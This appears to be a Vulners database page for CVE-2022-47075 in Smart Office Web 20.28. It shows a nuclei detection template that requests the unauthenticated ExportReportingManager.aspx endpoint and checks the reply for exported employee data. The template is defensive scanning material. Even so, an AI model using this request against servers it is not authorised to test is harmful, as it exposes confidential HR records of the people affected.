Lucene search
K

Smart Office Web 20.28 - Information Disclosure

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Smart Office Web 20.28 - Information Disclosure. Attackers can download sensitive info via ExportEmployeeDetails.aspx and ExportReportingManager.aspx, allowing information disclosure

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) Exploit
26 Jun 202300:00
zdt
Circl
CVE-2022-47075
14 May 202521:02
circl
CNNVD
SmartOffice 安全漏洞
28 Feb 202300:00
cnnvd
CNNVD
SmartOffice 安全漏洞
28 Feb 202300:00
cnnvd
CVE
CVE-2022-47075
28 Feb 202300:00
cve
Cvelist
CVE-2022-47075
28 Feb 202300:00
cvelist
Exploit DB
Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
22 Jun 202300:00
exploitdb
NVD
CVE-2022-47075
28 Feb 202323:15
nvd
OSV
CVE-2022-47075
28 Feb 202323:15
osv
OSV
CVE-2022-47076
28 Feb 202323:15
osv
Rows per page
id: CVE-2022-47075

info:
  name: Smart Office Web 20.28 - Information Disclosure
  author: r3Y3r53
  severity: high
  description: |
    An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.
  impact: |
    Unauthenticated attackers can download sensitive employee information including personal details, employee codes, and reporting relationships through vulnerable export endpoints in Smart Office Web, potentially exposing confidential HR data.
  remediation: |
    Upgrade to a version of Smart Office Web later than 20.28 that implements proper authentication checks on export endpoints.
  reference:
    - https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-47075
    - http://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html
    - https://cvewalkthrough.com/smart-office-suite-unauthenticated-data-ex/
    - https://youtu.be/D42upepxzwM
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-47075
    epss-score: 0.59407
    epss-percentile: 0.99006
    cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: smartofficepayroll
    product: smartoffice
  tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ExportReportingManager.aspx"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/CSV")'
          - 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")'
        condition: and
# digest: 490a00463044022021402af637cc3887cea78b7c6b0eef8356ac9161b327a6b8d8f860a96c34dddd02203c3cc38166042618990669032ba91f56f0f14771bf739f0fb1ceab394ec227f2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.59407
32